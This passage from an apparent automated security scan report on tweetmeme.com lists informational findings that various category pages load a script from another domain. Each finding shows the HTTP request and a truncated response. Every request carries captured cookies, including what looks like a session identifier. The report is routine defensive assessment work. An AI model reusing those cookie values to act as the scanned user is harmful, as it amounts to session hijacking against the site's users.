X-Ads-Served-In: 0.0052080154418945
X-Served-In: 0.047092914581299
X-Served-By: h00
Content-Length: 55895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Com
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.363. http://tweetmeme.com/category/comedy-animals previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/comedy-animals

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/comedy-animals HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:21:29 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0045111179351807
X-Served-In: 1.9421181678772
X-Served-By: h04
Content-Length: 54018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Ani
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.364. http://tweetmeme.com/category/comedy-fail previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/comedy-fail

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/comedy-fail HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:21:38 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0079748630523682
X-Served-In: 0.053991079330444
X-Served-By: h02
Content-Length: 51408

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Fai
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.365. http://tweetmeme.com/category/entertainment previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/entertainment

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/entertainment HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:21:47 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0060420036315918
X-Served-In: 0.051208019256592
X-Served-By: h04
Content-Length: 56691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Ent
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.366. http://tweetmeme.com/category/entertainment-celebrity previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/entertainment-celebrity

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/entertainment-celebrity HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:22:13 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0036988258361816
X-Served-In: 0.049623966217041
X-Served-By: h02
Content-Length: 56785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Cel
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.367. http://tweetmeme.com/category/entertainment-comicsanimation previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/entertainment-comicsanimation

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/entertainment-comicsanimation HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:22:21 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0046210289001465
X-Served-In: 0.051233053207397
X-Served-By: ded2060
Content-Length: 55631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Com
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.368. http://tweetmeme.com/category/entertainment-movies previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/entertainment-movies

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/entertainment-movies HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:22:34 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0033931732177734
X-Served-In: 0.045629978179932
X-Served-By: ded2059
Content-Length: 54445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Mov
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.369. http://tweetmeme.com/category/entertainment-music previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/entertainment-music

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/entertainment-music HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:22:37 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0037040710449219
X-Served-In: 0.044925212860107
X-Served-By: ded2061
Content-Length: 54709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Mus
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.370. http://tweetmeme.com/category/entertainment-television previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/entertainment-television

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/entertainment-television HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:23:00 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0036180019378662
X-Served-In: 0.045284986495972
X-Served-By: ded2061
Content-Length: 54886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Tel
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.371. http://tweetmeme.com/category/gaming previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/gaming

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/gaming HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:23:08 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0071480274200439
X-Served-In: 0.052395105361938
X-Served-By: h03
Content-Length: 58950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Gam
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.372. http://tweetmeme.com/category/gaming-nintendo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/gaming-nintendo

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/gaming-nintendo HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:23:26 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.016584157943726
X-Served-In: 0.39349889755249
X-Served-By: h00
Content-Length: 40821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Nin
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.373. http://tweetmeme.com/category/gaming-pcgames previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/gaming-pcgames

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/gaming-pcgames HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:23:43 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0083482265472412
X-Served-In: 0.89368987083435
X-Served-By: h04
Content-Length: 49095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
PC
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.374. http://tweetmeme.com/category/gaming-playstation previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/gaming-playstation

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/gaming-playstation HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:24:03 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0061628818511963
X-Served-In: 0.060573101043701
X-Served-By: h00
Content-Length: 59181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Pla
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.375. http://tweetmeme.com/category/gaming-webgames previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/gaming-webgames

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/gaming-webgames HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:24:07 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0026149749755859
X-Served-In: 2.949609041214
X-Served-By: h01
Content-Length: 26346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Web
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.376. http://tweetmeme.com/category/gaming-xbox previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/gaming-xbox

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/gaming-xbox HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:24:54 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.04665994644165
X-Served-In: 0.13526082038879
X-Served-By: ded2062
Content-Length: 58751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Xbo
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.377. http://tweetmeme.com/category/lifestyle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/lifestyle

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/lifestyle HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:25:29 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0062718391418457
X-Served-In: 0.050257921218872
X-Served-By: h00
Content-Length: 55356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Lif
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.378. http://tweetmeme.com/category/lifestyle-autos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/lifestyle-autos

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/lifestyle-autos HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:25:35 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0045361518859863
X-Served-In: 0.055244922637939
X-Served-By: h03
Content-Length: 54705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Aut
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.379. http://tweetmeme.com/category/lifestyle-educational previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/lifestyle-educational

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/lifestyle-educational HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:26:16 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0036990642547607
X-Served-In: 0.072364807128906
X-Served-By: ded2060
Content-Length: 56711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
